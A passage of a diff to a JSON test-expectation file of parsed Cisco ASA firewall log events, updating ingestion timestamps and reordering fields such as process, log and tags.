"ingested": "2021-12-09T13:32:20.604611100Z", + "ingested": "2021-12-14T14:37:05.575529440Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604616500Z", + "ingested": "2021-12-14T14:37:05.575529766Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", @@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604622100Z", + "ingested": "2021-12-14T14:37:05.575530284Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604627500Z", + "ingested": "2021-12-14T14:37:05.575530674Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604633100Z", + "ingested": "2021-12-14T14:37:05.575530999Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604638500Z", + "ingested": "2021-12-14T14:37:05.575531334Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604643800Z", + "ingested": "2021-12-14T14:37:05.575531665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", @@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604649200Z", + "ingested": "2021-12-14T14:37:05.575531999Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604654600Z", + "ingested": "2021-12-14T14:37:05.575532321Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604659900Z", + "ingested": "2021-12-14T14:37:05.575533137Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604665300Z", + "ingested": "2021-12-14T14:37:05.575533562Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604670700Z", + "ingested": "2021-12-14T14:37:05.575533902Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", @@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604676200Z", + "ingested": "2021-12-14T14:37:05.575534242Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604681600Z", + "ingested": "2021-12-14T14:37:05.575534588Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604687100Z", + "ingested": "2021-12-14T14:37:05.575534915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604690900Z", + "ingested": "2021-12-14T14:37:05.575535255Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604695200Z", + "ingested": "2021-12-14T14:37:05.575535584Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", @@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604699900Z", + "ingested": "2021-12-14T14:37:05.575535918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604704500Z", + "ingested": "2021-12-14T14:37:05.575536253Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604708Z", + "ingested": "2021-12-14T14:37:05.575536591Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604712200Z", + "ingested": "2021-12-14T14:37:05.575536925Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604717700Z", + "ingested": "2021-12-14T14:37:05.575537258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", @@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604722800Z", + "ingested": "2021-12-14T14:37:05.575537582Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604726400Z", + "ingested": "2021-12-14T14:37:05.575537914Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604730500Z", + "ingested": "2021-12-14T14:37:05.575538244Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604735300Z", + "ingested": "2021-12-14T14:37:05.575538597Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604739100Z", + "ingested": "2021-12-14T14:37:05.575538929Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", @@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604743500Z", + "ingested": "2021-12-14T14:37:05.575539258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604748900Z", + "ingested": "2021-12-14T14:37:05.575539584Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604754400Z", + "ingested": "2021-12-14T14:37:05.575539920Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604759800Z", + "ingested": "2021-12-14T14:37:05.575540263Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604765100Z", + "ingested": "2021-12-14T14:37:05.575540616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", @@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604770500Z", + "ingested": "2021-12-14T14:37:05.575540949Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604775800Z", + "ingested": "2021-12-14T14:37:05.575541284Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604842100Z", + "ingested": "2021-12-14T14:37:05.575541629Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604850100Z", + "ingested": "2021-12-14T14:37:05.575541959Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604856100Z", + "ingested": "2021-12-14T14:37:05.575542292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604861800Z", + "ingested": "2021-12-14T14:37:05.575542622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604866300Z", + "ingested": "2021-12-14T14:37:05.575542962Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604870900Z", + "ingested": "2021-12-14T14:37:05.575543295Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604890300Z", + "ingested": "2021-12-14T14:37:05.575543626Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604895Z", + "ingested": "2021-12-14T14:37:05.575543953Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604900500Z", + "ingested": "2021-12-14T14:37:05.575544283Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604905900Z", + "ingested": "2021-12-14T14:37:05.575544615Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604911300Z", + "ingested": "2021-12-14T14:37:05.575544949Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604916700Z", + "ingested": "2021-12-14T14:37:05.575545283Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604922100Z", + "ingested": "2021-12-14T14:37:05.575545632Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604927400Z", + "ingested": "2021-12-14T14:37:05.575545961Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604932700Z", + "ingested": "2021-12-14T14:37:05.575546292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604940300Z", + "ingested": "2021-12-14T14:37:05.575546627Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604946Z", + "ingested": "2021-12-14T14:37:05.575546957Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604951400Z", + "ingested": "2021-12-14T14:37:05.575547287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604956800Z", + "ingested": "2021-12-14T14:37:05.575547618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604962100Z", + "ingested": "2021-12-14T14:37:05.575547950Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 